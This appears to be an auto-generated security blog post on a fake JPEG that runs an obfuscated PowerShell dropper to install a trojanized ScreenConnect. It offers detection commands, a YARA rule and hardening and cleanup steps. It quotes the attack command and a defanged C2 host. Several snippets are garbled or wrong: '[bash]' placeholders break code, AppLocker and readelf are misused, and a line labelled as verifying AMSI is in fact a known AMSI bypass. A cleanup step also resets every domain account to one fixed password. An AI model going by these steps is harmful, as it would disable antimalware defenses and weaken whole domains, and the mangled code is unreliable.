Listen to this Post
Introduction:
A seemingly harmless JPEG file named “sysupdate.jpeg” is being used as a delivery vehicle for a trojanized version of ConnectWise ScreenConnect, a legitimate remote access tool. This attack chain – starting with an obfuscated PowerShell script hidden inside image metadata – bypasses traditional signature-based defenses and grants attackers persistent control, credential theft capabilities, and full surveillance over compromised Windows systems.
Learning Objectives:
- Analyze how a weaponized JPEG file executes a multi-stage PowerShell payload to deploy trojanized ScreenConnect.
- Detect and block obfuscated PowerShell attacks using AMSI, logging, and endpoint detection rules.
- Implement mitigation strategies against image-based malware and unauthorized remote access tools in enterprise environments.
You Should Know:
- How a JPEG File Becomes an Executable Payload
The attack begins with a file named `sysupdate.jpeg` that does not contain valid JPEG image data. Instead, its binary structure embeds an obfuscated PowerShell script. When a user double‑clicks the file (often after being tricked by a double extension or a misconfigured file association), Windows may execute the embedded script via PowerShell, or the script is extracted and run by an initial dropper.
Step‑by‑step breakdown of the infection chain:
- Delivery – The JPEG arrives as an email attachment or via a malicious download. Its icon mimics a standard image.
- Execution trigger – Social engineering (e.g., “Open to view this invoice”) or a script in a ZIP file launches
powershell.exe -ExecutionPolicy Bypass -File sysupdate.jpeg. - PowerShell extraction – The script reads its own byte stream, decodes a Base64‑embedded second stage, and loads it into memory.
- Trojanized ScreenConnect – The payload downloads a repackaged ScreenConnect client from a C2 server, configured to automatically connect to an attacker‑controlled relay.
- Persistence – Scheduled tasks or registry run keys ensure the trojaned ScreenConnect survives reboots.
Commands to analyze suspicious image files on Windows (PowerShell):
Check if a JPEG contains plaintext PowerShell keywords
findstr /i "powershell invoke-expression iex" sysupdate.jpeg
Extract hidden strings from the file
Get-Content sysupdate.jpeg -Raw | Select-String -Pattern '[A-Za-z0-9+/=]{40,}'
View file header – valid JPEG starts with FF D8 FF
Format-Hex sysupdate.jpeg -Count 16
Linux command to examine similar files:
Check file type file sysupdate.jpeg Extract strings, look for base64 or PowerShell indicators strings sysupdate.jpeg | grep -Ei "powershell|iex|invoke|frombase64string" View hex header xxd sysupdate.jpeg | head -n 5
2. Deobfuscating the Hidden PowerShell Script
Attackers heavily obfuscate PowerShell to evade static detection and human analysis. Common techniques include:
– Base64 encoding of the real script.
– String reversal, compression (GZip/Deflate), and XOR ciphers.
– Use of `IEX` (Invoke-Expression) to execute decoded content.
Manual deobfuscation steps (Windows PowerShell):
1. Extract the obfuscated string from the JPEG:
$raw = Get-Content sysupdate.jpeg -Raw
$pattern = '([A-Za-z0-9+/=]{100,})'
$matches = [bash]::Matches($raw, $pattern)
$b64string = $matches[bash].Value
2. Decode from Base64:
$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64string)) Write-Host $decoded
- Replace obfuscated aliases (e.g., `iex` →
Invoke-Expression) and evaluate step by step using `Write-Debug` or by replacing `IEX` withWrite-Host.
Automated deobfuscation with PowerShell 7:
Use the -DecodeCommand parameter (PS 7+)
$deobfuscated = & { $encoded = "SQBFAFgAKAAiAEgAZQBsAGwAbwAiACkA"; [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded)) }
YARA rule to detect weaponized JPEGs:
rule Weaponized_JPEG_PowerShell {
meta:
description = "Detects JPEG files containing PowerShell execution strings"
author = "Undercode"
strings:
$ps1 = /powershell.-[bash]xecutionPolicy/i
$ps2 = /iex\s(.frombase64string/i
$ps3 = "Invoke-Expression"
condition:
uint16(0) == 0xFFD8 and (any of ($ps))
}
3. Detecting Trojanized ScreenConnect Activity
Legitimate ScreenConnect (now ConnectWise Control) runs as `ScreenConnect.ClientService.exe` or ScreenConnect.WindowsClient.exe. The trojanized version often uses:
– Different file hashes, unsigned binaries, or mismatched digital signatures.
– Unusual command‑line arguments connecting to rogue domains.
– Persistent calls to attacker‑controlled C2 (e.g., hxxp://malicious-relay[.]com).
Windows commands to identify suspicious instances:
List ScreenConnect processes with full command line
Get-WmiObject Win32_Process | Where-Object { $_.Name -like "ScreenConnect" } | Select-Object ProcessId, CommandLine
Check for unsigned ScreenConnect binaries
Get-AuthenticodeSignature "C:\Program Files\ScreenConnect\client.exe" | Where-Object { $_.Status -ne "Valid" }
Monitor outbound connections to non‑standard ports (8041 is default)
netstat -ano | findstr ":8041"
Event Log hunting (PowerShell):
Look for ScreenConnect service install events
Get-WinEvent -FilterHashtable @{LogName='System'; ID=7045} | Where-Object { $_.Message -like "ScreenConnect" }
Detect PowerShell launching ScreenConnect
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | Where-Object { $_.Message -like "ScreenConnect" }
- Blocking the Attack Chain with AMSI and AppLocker
Antimalware Scan Interface (AMSI) can detect PowerShell obfuscation before execution. To harden systems:
Enable AMSI logging and blocking (Group Policy or Registry):
Set AMSI to block obfuscated scripts (requires PowerShell 5+)
Set-MpPreference -DisableObfuscatedScriptsDetection 0 0 = detect
Set-MpPreference -PUAProtection Enabled
Verify AMSI is active
[bash].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) Should throw error if AMSI works
AppLocker rule to allow only signed ScreenConnect:
Create a Default rule to block all executables in Program Files unless signed by ConnectWise New-AppLockerPolicy -RuleType Exe -User Everyone -Action Deny -Path "%ProgramFiles%\ScreenConnect\" New-AppLockerPolicy -RuleType Exe -User Everyone -Action Allow -Publisher "CN=ConnectWise LLC, O=ConnectWise LLC"
Alternative using Windows Defender ASR rules:
Add-MpPreference -AttackSurfaceReductionRules_Ids 'BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550' -AttackSurfaceReductionRules_Actions Enabled This rule blocks executable content from email and web downloads (including JPEG attachments)
- Extracting and Analyzing the Trojanized Remote Access Tool
Once the trojaned ScreenConnect is installed, it typically registers as a service. To reverse engineer the binary:
Linux analysis workflow (with Wine for Windows PE):
Extract the binary from memory or disk Use procdump from Sysinternals (run via Wine) wine procdump -e -ma ScreenConnect.ClientService.exe Analyze strings and imports strings ScreenConnect.ClientService.exe | grep -E "http|socket|connect|credential" readelf -W -d ScreenConnect.ClientService.exe Show DLL dependencies Check for packers using Detect It Easy (diec) diec ScreenConnect.ClientService.exe
Windows static analysis with free tools:
:: Run from elevated Command Prompt :: Use PEStudio to find anomalies "C:\Tools\pestudio\pestudio.exe" "C:\Program Files\ScreenConnect\ScreenConnect.ClientService.exe" :: Extract network indicators using Strings64 strings64.exe -n 8 "C:\Program Files\ScreenConnect\ScreenConnect.ClientService.exe" | findstr /i "http:// https:// .onion :8041"
Dynamic analysis in a sandbox (PowerShell snippet for logging):
Monitor file and registry changes during execution Start-Transcript -Path "$env:temp\screenconnect_trace.log" $proc = Start-Process -FilePath "C:\Program Files\ScreenConnect\ScreenConnect.ClientService.exe" -PassThru -NoNewWindow Wait 30 seconds then capture connections Start-Sleep -Seconds 30 netstat -ano | findstr $proc.Id Stop-Transcript
6. Hardening Endpoints Against Image‑Based Malware
Prevention is superior to detection. Apply these controls:
Disable PowerShell execution from non‑standard file extensions (Windows):
Remove .jpeg and .jpg association with PowerShell (if present) cmd /c assoc .jpeg=jpegfile Reset to default cmd /c assoc .jpg=jpegfile Prevent PowerShell from running from user download directories Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1
Configure Windows Defender to scan inside archives and images:
Set-MpPreference -DisableArchiveScanning 0 Set-MpPreference -DisableEmailScanning 0 Set-MpPreference -AllowNetworkProtectionOnWinServer 1 Set-MpPreference -EnableNetworkProtection Enabled
Use Sysmon to log image loads and process creation:
<!-- Install Sysmon, then use this config snippet --> <Sysmon> <EventFiltering> <ProcessCreate onmatch="include"> <CommandLine condition="contains">.jpeg</CommandLine> </ProcessCreate> <ImageLoad onmatch="include"> <ImageLoaded condition="end with">powershell.exe</ImageLoaded> </ImageLoad> </EventFiltering> </Sysmon>
Apply with: `sysmon64.exe -accepteula -i sysmon_config.xml`
7. Incident Response: Removing the Infection
If a system is already compromised:
Step 1 – Kill malicious processes:
Get-Process | Where-Object {$<em>.Path -like "ScreenConnect" -and (Get-AuthenticodeSignature $</em>.Path).Status -ne "Valid"} | Stop-Process -Force
Step 2 – Delete the weaponized JPEG and downloaded payloads:
Remove-Item -Path "C:\Users\Downloads\sysupdate.jpeg" -Force -Recurse -ErrorAction SilentlyContinue Remove-Item -Path "C:\ProgramData\ScreenConnect\" -Force -Recurse
Step 3 – Remove persistence:
Delete scheduled tasks
Get-ScheduledTask | Where-Object {$_.TaskName -like "ScreenConnect"} | Unregister-ScheduledTask -Confirm:$false
Remove registry run keys
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ScreenConnect" -ErrorAction SilentlyContinue
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ScreenConnect" -ErrorAction SilentlyContinue
Step 4 – Reset credentials and rotate tokens:
Force password change for all domain users (run from DC)
Get-ADUser -Filter | ForEach-Object { Set-ADAccountPassword -Identity $_.SamAccountName -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "TempP@ss123!" -Force) }
Revoke Kerberos tickets
klist purge
What Undercode Say:
- Image files are not safe by extension – A JPEG header means nothing; any file can embed executable code. Always scan with content‑aware tools, not just extension or MIME type.
- Trojanized remote access tools are the new backdoor – Attackers abuse signed but repackaged software like ScreenConnect to bypass firewalls and blend into enterprise traffic. Application whitelisting and certificate pinning are essential.
Analysis: This attack highlights a shift toward “living‑off‑the‑land” techniques where legitimate executables become the malware. The use of ScreenConnect – a tool trusted by many IT teams – makes detection extremely difficult because outbound connections to remote support servers appear normal. Defenders must combine AMSI, process command‑line auditing, and behavioral rules that flag unusual parent‑child relationships (e.g., PowerShell spawning ScreenConnect). Additionally, educating users that image files can be malicious is critical; no interactive preview should ever require script execution.
Prediction:
As weaponized multimedia files become more sophisticated, we will see attackers embedding encrypted payloads directly into image metadata (EXIF, comment sections, or pixel LSB steganography). Future variants will likely use compiled PowerShell (.NET) or even WebAssembly to evade AMSI completely. Enterprises must adopt Zero Trust principles: treat every file as untrusted, enforce dynamic content analysis in email gateways, and deploy endpoint detection that reconstructs file headers on the fly. The ScreenConnect trojan is a blueprint – expect similar campaigns targeting TeamViewer, AnyDesk, and Splashtop within the next 6–12 months.
▶️ Related Video (80% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Mayura Kathiresh – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
